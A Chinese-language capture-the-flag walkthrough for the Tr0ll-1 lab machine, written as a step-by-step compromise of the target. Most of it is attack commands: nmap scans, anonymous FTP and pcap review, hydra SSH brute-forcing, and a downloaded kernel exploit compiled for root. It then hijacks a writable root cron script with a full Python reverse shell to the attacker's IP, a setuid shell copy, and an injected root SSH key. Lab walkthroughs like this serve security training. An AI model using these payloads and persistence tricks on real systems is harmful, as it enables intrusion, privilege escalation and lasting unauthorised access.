Tr0ll-1
查看靶机ip
直接ifconfig看看自己的
ifconfig
192.168.161段。
接着用nmap去找一下靶机所在的ip
nmap 192.168.161.0/24 -sP
所以我们的靶机ip是192.168.161.147
nmap枚举
查看靶机的所有端口
nmap -p- 192.168.161.147
21/tcp open ftp
22/tcp open ssh
80/tcp open http发现了这三个端口。
查看这些端口的详细信息
nmap 192.168.161.147 -p- -sS -sV -A -T5
内容是这些
ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 09 2014 lol.pcap
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/secret发现ftp存在lol.pcap流量文件,还有FTP带有匿名登录名:Anonymous FTP login allowed,80http存在robots.txt和/secret目录文件
登录FTP枚举
登陆ftp
ftp 192.168.161.147账号密码都是Anonymous
登陆成功。
查看文件目录
dir
存在lol.pcap流量包。
提取出来
get lol.pcap
提取成功,exit退出就行。
wireshark分析流量
用wireshark进行分析
wireshark lol.pcap
wireshark对流量界面右键->追踪流量->TCP流量
发现只有0-3。
先看1
第一个流显示了一个文件secret_stuff.txt
看第二个
发现了sup3rs3cr3tdirlol
第三个和第一个一样。
页面枚举
去看看80端口里面是什么样子。
在后面输入,我们在上面找到的两个文件。
先是/secret_stuff.txt
什么都没有。
在输入/sup3rs3cr3tdirlol
具有文件。
下载roflmao。
查看文件类型
file roflmao
是32位的ELF 二进制文件
用strings试一试
strings roflmao
发现了一个地址0x0856BF
试试网站能不能进去。
可以进来。
继续页面枚举
在这个地方看一看这两个文件夹都是有什么。
在good_luck里面发现了一个txt文件
这个应该是账号。
因为下一个文件夹写的是密码。密码里面写的是goodjob,这说明这个文件名就是密码。
文件名叫Pass.txt
把用户名保存下来。
hydra爆破
这里爆破ssh就行。
hydra -L user.txt -p Pass.txt 192.168.161.147 ssh
直接成功。
所以用户名是overflow
密码是Pass.txt
登录系统ssh
ssh overflow@192.168.161.147密码是Pass.txt
登陆成功,进入tty
python -c 'import pty; pty.spawn("/bin/bash")'
看看版本
uname -a
Linux 4-Tr0ll 3.13.0还是ubuntu
进行提权
去kali的searchsploit看看有没有
searchsploit Linux ubuntu 3.13.0
发现了第一个可以用
下载下来。
看看脚本内容。
发现只需要gcc编译完直接运行就行。
开一个http服务,来把这个文件传上去
python -m http.server 8081然后去服务器下载
wget http://192.168.161.142:8081/37292.c
接下来进行gcc
gcc 37292.c -o qjzhalx
./qjzhalx得到flag
扩充打法
进行ssh连接
ssh overflow@192.168.161.147密码是Pass.txt
进入tty
python -c 'import pty; pty.spawn("/bin/bash")'进去之后过去不久,会断开连接
Broadcast Message from root@4-Tr
(somewhere) at 8:40 …
TIMES UP LOL!
Connection to 192.168.161.147 closed by remote host.
Connection to 192.168.161.147 closed.
它会自动结束ssh进程,而且还是整点提示!说明有计划任务在自动到点结束进程。每5分钟就被踢一次!
接下来看看是为什么
find / -name cronlog 2>/dev/null ---查看计划任务日志信息
发现cleaner.py文件。
find / -name cleaner.py 2>/dev/null ---查看文件在哪儿
在/lib/log/cleaner.py。
内容是
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()- 小技巧1
find / -writable 2>/dev/null ---枚举所有可写入权限的文件- 小技巧2
ind / -perm -o+w -type f 2> /dev/null | grep /proc -v ---枚举可以执行可以写入的文件知道了计划任务和py脚本可写入,以及py的位置后,那么方法千万种,接下来我用三种
反弹shell
使用nano来改写这个cleaner.py的文件
需要改成什么样子呐
我们只需要把里面的内容全部删除,然后写入
#!/usr/bin/python
def con():
import socket, time,pty, os
host='192.168.161.142'
port=9999
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.settimeout(10)
s.connect((host,port))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()
con()nano /lib/log/cleaner.py然后改写
然后输入CTRL X然后再输入y,最后回车
cat看一看。
千万别忘记再自己kali里面开个监护。
nc -vlp 9999
反弹成功。
创建root可执行程序,获得root权限
在原来的python文件里面改成这样就行
#!/usr/bin/env python
import os
import sys
try:
os.system('cp /bin/sh /tmp/qjzhalx')
os.system('chmod u+s /tmp/qjzhalx')
except:
sys.exit()改好了
接下来再开一个终端,进行ssh连接,然后去/tmp文件夹里面。
然后等待
成功了去拿flag
写入ssh rsa,ssh登录root用户
输入
ssh-keygen --全部都空格回车
然后接着输入
cd ~/.ssh
cat id_rsa.pub --这里的rsa是你自己的这里我们需要把他加入到py脚本中
mkdir /root/.ssh; chmod 775 .ssh; echo "加上 id_rsa.pub产生的密匙内容上图有例子" >> /root/.ssh/authorized_keys继续去改那个py文件,这次改成。
#!/usr/bin/env python
import os
import sys
try:
os.system('mkdir /root/.ssh; chmod 775 .ssh; echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIH0l032W5fnhO3obB/PAvJextRxTAxGtgwsdteHJ3/Hd root@kali" >> /root/.ssh/authorized_keys')
except:
sys.exit()
再去开一个终端,ssh用root登录
ssh root@192.168.161.147等待,等到不输入密码就能进入的时候
成功了,拿flag去喽。
